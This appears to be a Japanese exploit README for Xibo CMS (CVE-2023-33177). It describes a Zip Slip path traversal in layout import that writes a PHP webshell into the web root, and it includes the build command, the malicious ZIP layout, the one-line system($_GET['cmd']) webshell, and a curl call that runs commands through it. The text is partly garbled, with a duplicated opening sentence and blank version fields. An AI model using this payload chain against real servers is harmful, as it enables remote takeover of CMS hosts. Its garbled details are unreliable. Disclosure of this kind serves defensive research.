
このエクスプロイトは、Xibo CMS (CVE-2023-33177) における **パストラバーサルの脆弱性** を実証しており、悪意のあるレイアウトインポートを通じてリモートコード実行を可能にします。
このエクスプロイトは、Xibo CMS (CVE-2023-33177) のパストラバーサル脆弱性を実証し、悪意のあるレイアウトインポートを通じてリモートコード実行を可能にします。
CVE/アドバイザリ: CVE-2023-33177 影響を受けるバージョン:
脆弱性タイプ: パストラバーサル (Zip Slip) 影響: リモートコード実行 (RCE)
Xibo CMS は、認証されたユーザーが ZIP アーカイブを介してレイアウトファイルをインポートすることを許可します。インポート機能は mapping.json ファイル内のファイルパスを適切に検証できず、攻撃者はパストラバーサルシーケンス (../../) を使用して、意図されたライブラリディレクトリの外部にファイルを書き込むことができます。
mapping.json にパストラバーサルを注入: ファイルパスとして ../../web/shell.php を使用library/../../web/shell.php/var/www/cms/web/shell.php に解決されるZip contains: library/../../web/shell.php
Xibo reads: library/ + ../../web/shell.php (from mapping.json)
Xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php
Result: /var/www/cms/web/shell.php ← Webshell in web root!
python3 create_exploit.py
これにより、悪意のあるレイアウトパッケージを含む exploit.zip が作成されます。
xibo_admin / password)exploit.zip をアップロードcurl 'http://localhost:8080/shell.php?cmd=id'
エクスプロイト ZIP の内容:
exploit.zip
├── layout.json # Valid Xibo layout definition
├── playlist.json # Empty playlist (triggers JSON import)
├── mapping.json # Contains path traversal payload
└── library/
└── ../../web/
└── shell.php # PHP webshell (gets extracted to web root)
組み込まれたウェブシェルは最小限です:
<?php system($_GET["cmd"]); ?>
アクセス方法: http://<target>/shell.php?cmd=<command>
修正済みバージョン:
緩和戦略:
.. や絶対パスを含むパスを拒否するこのエクスプロイトは以下の目的で提供されます:
所有していない、またはテストの明示的な許可がないシステムに対してこのエクスプロイトを使用しないでください。
complexusprada 2025年11月